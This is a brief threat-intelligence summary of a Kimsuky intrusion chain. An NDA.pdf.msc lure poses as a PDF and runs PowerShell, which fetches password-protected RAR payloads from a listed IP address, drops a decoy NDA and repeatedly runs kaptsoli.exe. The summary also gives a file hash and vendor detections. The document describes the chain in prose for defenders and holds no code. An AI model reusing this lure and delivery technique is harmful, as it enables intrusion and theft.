Kimsuky activity used an NDA.pdf.msc lure that looked like a PDF through a Microsoft Edge icon but executed as a Windows MSC file. Triple Base64-decoded content launched PowerShell to download password-protected RAR payloads and UnRAR from 109.107.157.107, extract follow-on files, and execute script content from the temporary directory. The chain dropped a decoy NDA PDF tied to a blockchain game project, hid PowerShell or Windows Terminal windows, bypassed execution policy, and repeatedly executed the extracted kaptsoli.exe payload. The source reports SHA-256 bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61 and vendor detections for XML or MSC downloader behavior.